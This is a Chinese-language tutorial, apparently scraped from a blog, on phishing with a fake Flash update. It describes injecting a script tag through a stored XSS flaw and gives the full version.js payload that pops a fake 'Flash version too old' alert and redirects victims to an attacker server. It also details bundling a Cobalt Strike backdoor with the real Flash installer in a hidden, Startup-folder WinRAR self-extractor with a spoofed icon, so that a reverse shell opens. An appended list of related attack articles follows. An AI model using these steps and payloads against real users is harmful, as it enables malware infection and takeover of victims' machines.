钓鱼攻击之:Flash 网页钓鱼

1 准备资料

  1. Flash网站克隆源码:GitHub - hackxc/xss_flash: Xss之Flash钓鱼
  2. 生成后门并捆绑flash的安装程序
  3. VPS服务器,并使用步骤1的资源,搭建好flash网站,下载地址要修改为构造好的后门文件。
  4. 有XSS漏洞的网站:GitHub - r00tSe7en/Flash-Pop: Flash钓鱼弹窗优化版

2 具体钓鱼流程

  1. 找到可以插入一段JS代码的网站,如:存在存储xss漏洞。插入触发flash版本过低弹窗的JS代码:

    <script src='http://192.168.10.3/version.js'></script>
  2. 目标点击确定后,跳转到伪造flash界面的VPS服务器,

  3. 目标靶机点击下载并安装,触发后门反弹shell

3 生成后门并捆绑flash的安装程序

  1. 通过CS生成C格式的shellcode,利用下面的网站生成后门程序

  2. 安装Winrar。

  3. 同时选中后门与Flash官方安装包,右键选择:添加到压缩文件。

  4. 选择:创建自解压格式压缩文件-->修改:压缩文件名(使其看起来更可信)

  5. 选择:高级-->自解压选项-->更新-->更新模式:解压并更新文件-->覆盖模式:覆盖所有文件

  6. 高级自解压选项窗口中选择:常规-->解压路径放到windows开机自启动目录

    C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup

  7. 高级自解压选项窗口中选择:设置-->解压后运行:r9VTngXsPg.exe-->解压前运行:flashplayerpp_install_cn.exe

  8. 高级自解压选项窗口中选择:模式-->全部隐藏

  9. 生成文件

  10. 为了增加可信度,修改生成后的文件图标

    1. 使用 ResourceHacker 导出flash官方文件的图标组

    2. 再用 ResourceHacker 将生成的自解压文件图标组修改成刚刚导出的flash图标组

    3. 另存为exe文件,再次确保命名为官网相同文件名

  11. 上传到VPS服务器中

4 处理WEB站点过程

  1. 模拟伪造Flash网站的VPS服务器:kali下

    1. 将下载的xss_flash目录中的文件全部移到/var/www/html

    2. 修改下载软件的地址为前面构造的后门软件

    3. 修改version.js中弹窗的指向伪造Flash网站地址

      window.alert = function(name){
      var iframe = document. createElement("IFRAME");
      iframe.style.display="none";
      iframe.setAttribute("src",'data:text/plain,');
      document. documentElement.appendChild(iframe);
      window.frames [0].window.alert(name);
      iframe.parentNode.removeChild(iframe);
      }
      alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
      window. location.href="http://192.168.10.3";
      • 此处伪造Flash网站地址为:http://192.168.10.3
    4. 启动apache2服务

  2. 模拟存在XSS网站的VPS服务器:index.html

    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    <title>Flash Test...</title>
    <script src='http://192.168.10.3/version.js'></script>
    </head>
    <body>
    <h1>Flash Test...</h1>
    </body>
    </html>
    • 模拟插入了<script src='http://192.168.10.3/version.js'></script>脚本
    • 此处存在XSS网站的VPS服务器地址为:http://192.168.10.3:81
  3. 目标靶机访问到这个存在XSS的页面就会执行代码

  4. 点确定后,跳转到伪造Flash网站

  5. 目标靶机点击下载并运行exe后,成功上线

钓鱼攻击之:Flash 网页钓鱼的更多相关文章

  1. DNS欺骗:网站克隆实现网站钓鱼攻击

    1 DNS 1.1 DNS是什么? 域名系统(Domain Name System)是互联网使用的命名系统,用来将主机域名转换为 ip 地址,属于应用层协议,使用 UDP 传输. 1.2 为什么需要D ...

  2. 支付SDK的安全问题——隐式意图可导致钓鱼攻击

     该漏洞涉及到app所使用的intent和intent filter. intent是一个可用于从一个app组件请求动作或处理事件的“消息对象”.Intent负责对应用中一次操作的动作.动作涉及数据. ...

  3. pikachu练习平台(XSS-漏洞测试案例(cookie的窃取和利用、钓鱼攻击、XSS获取键盘记录))

    XSS-漏洞测试案例 xss案例 1.cookie的窃取和利用 2.钓鱼攻击 3.XSS获取键盘记录 在进行案例之前首先要搭建xss后台 搭建xss后台 1.在pikachu文件夹下面,把pkxss单 ...

  4. CobaltStrike 生成office宏病毒进行钓鱼攻击

    关于WORD宏: 在百度百科上有: 宏是一个批量处理程序命令,正确地运用它可以提高工作效率.微软的office软件允许用户自己编写,叫VBA的脚本来增加其灵活性,进一步扩充它的能力.如完打开word文 ...

  5. 风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

    风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击 XSS钓鱼攻击 HTTP Basic Authentication认证 大家在登录网站的时候,大部分时候是通过一个表单提交登录信息. 但是有时候 ...

  6. 钓鱼攻击之远程加载恶意Word模版文件上线CS

    0x00 前言 利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器请求恶意模板并执行恶意模板上的恶意代码.这里 ...

  7. kali下利用weeman进行网页钓鱼

    工具下载链接:https://files.cnblogs.com/files/wh4am1/weeman-master.zip 利用wget命令下载zip压缩包 利用unzip命令解压 接着直接cd进 ...

  8. 推荐美丽的flash网页MP3音乐播放器

    文章来源:PHP开发学习门户 地址:http://www.phpthinking.com/archives/491 在网页制作中.假设想在网页中插入mp3音乐来增添网页的互动感,提升用户体验度,这个时 ...

  9. Selenium+Java - 结合sikuliX操作Flash网页

    前言 前天被一个Flash的轮播图,给玩坏了,无法操作,后来请教了下crazy总拿到思路,今天实践了下,果然可以了,非常感谢! 模拟场景 打开百度地图 切换城市到北京 使用测距工具 测量 奥林匹克森林 ...

  10. 使用Wifi pineapple(菠萝派)进行Wi-Fi钓鱼攻击

    简介: WiFi Pineapple 是由国外无线安全审计公司Hak5开发并售卖的一款无线安全测试神器. 特性: 用作 Wi-Fi 中间人攻击测试平台 一整套的针对 AP 的渗透测试套件 基于 WEB ...

随机推荐

  1. 【算法题型总结】--6、BFS

    // 计算从起点 start 到终点 target 的最近距离 int BFS(Node start, Node target) { Queue<Node> q; // 核心数据结构 Se ...

  2. MetaTown:一个可以自己构建数字资产的平台

    摘要:华为云Solution as Code重磅推出<基于MetaTown构建数字资产平台>解决方案. 本文分享自华为云社区<基于MetaTown构建数字资产平台>,作者: 阿 ...

  3. dotTrace工具

    1.dotTrace简介: (1)dotTrace是一个包含了可用于.NET应用程序的性能分析器(dotTrace Performance)和内存分析器(dotTrace Memory)的套件: (2 ...

  4. MongoDB从入门到实战之MongoDB简介

    前言 相信很多同学对MongoDB这个非关系型数据库都应该挺熟悉的,在一些高性能.动态扩缩容.高可用.海量数据存储.数据价值较低.高扩展的业务场景下MongoDB可能是我们的首选,因为MongoDB通 ...

  5. python 水仙花数、菱形、99乘法表、直角三角形

    空心菱形 i = 1 while i <= 3: # 控制行数 j = 1 k = 1 while j <= 3-i: # 控制空格数量 print(" ", end= ...

  6. 基于SqlSugar的开发框架循序渐进介绍(24)-- 使用Serialize.Linq对Lambda表达式进行序列化和反序列化

    在上篇随笔<基于SqlSugar的开发框架循序渐进介绍(23)-- Winform端管理系统中平滑增加对Web API对接的需求>中介绍了基于一个接口,实现对两种不同接入方式(直接访问数据 ...

  7. [OpenCV实战]17 基于卷积神经网络的OpenCV图像着色

    目录 1 彩色图像着色 1.1 定义着色问题 1.2 CNN彩色化结构 1.3 从 中恢复彩色图像 1.4 具有颜色再平衡的多项式损失函数 1.5 着色结果 2 OpenCV中实现着色 2.1 模型下 ...

  8. 将xlsx列表文件转为md列表

    转换网站: https://tableconvert.com/ 在这篇文章中,我将告诉你如何快速的将Excel转换为markdown表格,以及如何将Google Docs,Numbers,网页中的表格 ...

  9. [C#]C++/CLI中interior_ptr和pin_ptr的区别

    interior_ptr 当垃圾回收器移动对象时,Interior pointer能随之移动,并始终指向该对象. 但是如果把这个指针返回给外部函数,那么当垃圾回收时(垃圾回收期间会压缩对象,),对象地 ...

  10. react 高效高质量搭建后台系统 系列 —— 登录

    其他章节请看: react 高效高质量搭建后台系统 系列 登录 本篇将完成登录模块.效果和 spug 相同: 需求如下: 登录页的绘制 支持普通登录和LDAP登录 登录成功后跳转到主页,没有登录的情况 ...